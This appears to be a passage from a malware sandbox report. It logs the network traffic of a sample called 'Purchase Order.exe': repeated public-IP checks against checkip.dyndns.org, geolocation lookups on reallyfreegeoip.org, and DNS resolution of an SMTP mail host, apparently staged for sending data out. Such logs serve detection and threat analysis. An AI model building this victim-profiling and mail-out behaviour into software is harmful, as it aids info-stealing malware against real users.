                                                                          Apr 4, 2024 10:28:41.198482990 CEST1.1.1.1192.168.2.50xb066No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                          Apr 4, 2024 10:28:41.198482990 CEST1.1.1.1192.168.2.50xb066No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                          • reallyfreegeoip.org
                                                                          • scratchdreams.tk
                                                                          • checkip.dyndns.org
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.549709132.226.247.73803304C:\Users\user\Desktop\Purchase Order.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Apr 4, 2024 10:27:55.442771912 CEST151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Apr 4, 2024 10:27:55.679744959 CEST324INHTTP/1.1 200 OK
                                                                          Date: Thu, 04 Apr 2024 08:27:55 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 107
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: a8d8a25a90b944cd1eacf99a243a6fd4
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
                                                                          Apr 4, 2024 10:27:55.684537888 CEST127OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Apr 4, 2024 10:27:55.920300961 CEST324INHTTP/1.1 200 OK
                                                                          Date: Thu, 04 Apr 2024 08:27:55 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 107
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 029e45e120d41971ec3403e46bd3e972
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
                                                                          Apr 4, 2024 10:27:56.657218933 CEST127OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Apr 4, 2024 10:27:56.892607927 CEST324INHTTP/1.1 200 OK
                                                                          Date: Thu, 04 Apr 2024 08:27:56 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 107
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 979b3ddaf0e34c0317d8d37bf5edee30
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.549712132.226.247.73803304C:\Users\user\Desktop\Purchase Order.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Apr 4, 2024 10:27:57.696743965 CEST127OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Apr 4, 2024 10:27:57.929542065 CEST324INHTTP/1.1 200 OK
                                                                          Date: Thu, 04 Apr 2024 08:27:57 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 107
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: d7ba73d36e5c9fbdfdfc35d3fab4b00f
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.549714132.226.247.73803304C:\Users\user\Desktop\Purchase Order.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Apr 4, 2024 10:27:58.721911907 CEST151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Apr 4, 2024 10:27:58.952750921 CEST324INHTTP/1.1 200 OK
                                                                          Date: Thu, 04 Apr 2024 08:27:58 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 107
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: f1afde81224670f41b15b771dd5c8132
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.549716132.226.247.73803304C:\Users\user\Desktop\Purchase Order.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Apr 4, 2024 10:27:59.742269039 CEST151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Apr 4, 2024 10:27:59.972361088 CEST324INHTTP/1.1 200 OK
                                                                          Date: Thu, 04 Apr 2024 08:27:59 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 107
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 8f673b48751b8d9948e9a844dcc0b9b4
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.549718132.226.247.73803304C:\Users\user\Desktop\Purchase Order.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Apr 4, 2024 10:28:00.764883995 CEST151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Apr 4, 2024 10:28:01.057905912 CEST324INHTTP/1.1 200 OK
                                                                          Date: Thu, 04 Apr 2024 08:28:00 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 107
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 3633875e42150ff4391b74770046949f
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.549720132.226.247.73803304C:\Users\user\Desktop\Purchase Order.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Apr 4, 2024 10:28:01.851242065 CEST151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Apr 4, 2024 10:28:02.083789110 CEST324INHTTP/1.1 200 OK
                                                                          Date: Thu, 04 Apr 2024 08:28:01 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 107
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 48d734182622e4b2b33c41a7851c2af7
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.549722132.226.247.73803304C:\Users\user\Desktop\Purchase Order.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Apr 4, 2024 10:28:02.878231049 CEST151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Apr 4, 2024 10:28:03.110166073 CEST324INHTTP/1.1 200 OK
                                                                          Date: Thu, 04 Apr 2024 08:28:02 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 107
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 0317de2997528c5e3c2ae3cca99de9e1
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.549710104.21.67.1524433304C:\Users\user\Desktop\Purchase Order.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-04 08:27:56 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          Connection: Keep-Alive
                                                                          2024-04-04 08:27:56 UTC720INHTTP/1.1 200 OK
                                                                          Date: Thu, 04 Apr 2024 08:27:56 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 69857
                                                                          Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F%2FvHvAJQIYn%2BMt2NVna4k%2FY6PJE%2BT9hn5W9waF%2BAZEbLLnRL8vEccrF%2FiL8MHF36TQHH23MwhJlC5tSqPsw%2FhiP%2FocU%2Fo%2B46UfFYwTEJQW0FZN2KdFWIWGYfd2NSXODgI2h0sEDv"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 86efec0e98f9b3d4-MIA
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-04-04 08:27:56 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                          Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                          2024-04-04 08:27:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.549711104.21.67.1524433304C:\Users\user\Desktop\Purchase Order.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-04 08:27:57 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          2024-04-04 08:27:57 UTC708INHTTP/1.1 200 OK
                                                                          Date: Thu, 04 Apr 2024 08:27:57 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 69858
                                                                          Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NtJGRVcFbB2h46eKfCG0iFUd5cw4Dfct8SfRutJp23wA3Vh0CQ4ypWW049ynz4VlBYdppFhp1m%2FE6pwRlOjKTa7pjT2u0b3%2BnGQREnQNLcqARp%2F0nVC2FbJqLhWXq%2FP07hjOfY3n"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 86efec139819b3b9-MIA
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-04-04 08:27:57 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                          Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                          2024-04-04 08:27:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.549713104.21.67.1524433304C:\Users\user\Desktop\Purchase Order.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-04 08:27:58 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          2024-04-04 08:27:58 UTC712INHTTP/1.1 200 OK
                                                                          Date: Thu, 04 Apr 2024 08:27:58 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 69859
                                                                          Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0rZXdXb0rt1QawcrJqT%2FZ2a6mrPj1Oi%2BqnIO3UVE9SM%2BVHma8UmslwONzUcPBKKCcz%2FErJemaRPY8m4bbvoYjTYDM8i%2Bxnv3Gg1YFc4RoOUrRoI5tXX6l4LB%2F95ioX3oHhCSx1bO"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 86efec1a1dac5c86-MIA
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-04-04 08:27:58 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                          Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                          2024-04-04 08:27:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.549715104.21.67.1524433304C:\Users\user\Desktop\Purchase Order.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-04 08:27:59 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          Connection: Keep-Alive
                                                                          2024-04-04 08:27:59 UTC706INHTTP/1.1 200 OK
                                                                          Date: Thu, 04 Apr 2024 08:27:59 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 69860
                                                                          Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jmtz9c6e0wZQzNxsysDxjk07ZGSc7jTSwZpIb9MesUVnEHoWnt8xJCqvnSZd2ZPRG121zCmpJxmqDYG%2BrVI2HXO9Gw2UpMCozS%2BlZPuoShNa%2FJ8UW5RX13fZDCVf3iLDEjWm2L5T"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 86efec207a6b7431-MIA
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-04-04 08:27:59 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                          Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                          2024-04-04 08:27:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.549717104.21.67.1524433304C:\Users\user\Desktop\Purchase Order.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-04 08:28:00 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          Connection: Keep-Alive
                                                                          2024-04-04 08:28:00 UTC716INHTTP/1.1 200 OK
                                                                          Date: Thu, 04 Apr 2024 08:28:00 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 69861
                                                                          Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ybWN%2Fp9tvdw6NqxY%2Fv4MbnkedicQQ4xrgs4PAxVZA%2BC2IWe%2B31VdUyeLlcfQJk%2BSVOMfrzmHFnp2K7pC7iK%2Fz6CVgJHZyolvJGgjLzdKb0qHYeIY3e0Q9YxoFspOphocsY%2Fv%2BnHK"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 86efec26d8fc7446-MIA
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-04-04 08:28:00 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                          Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                          2024-04-04 08:28:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.549719104.21.67.1524433304C:\Users\user\Desktop\Purchase Order.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-04 08:28:01 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          Connection: Keep-Alive
                                                                          2024-04-04 08:28:01 UTC712INHTTP/1.1 200 OK
                                                                          Date: Thu, 04 Apr 2024 08:28:01 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 69862
                                                                          Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT
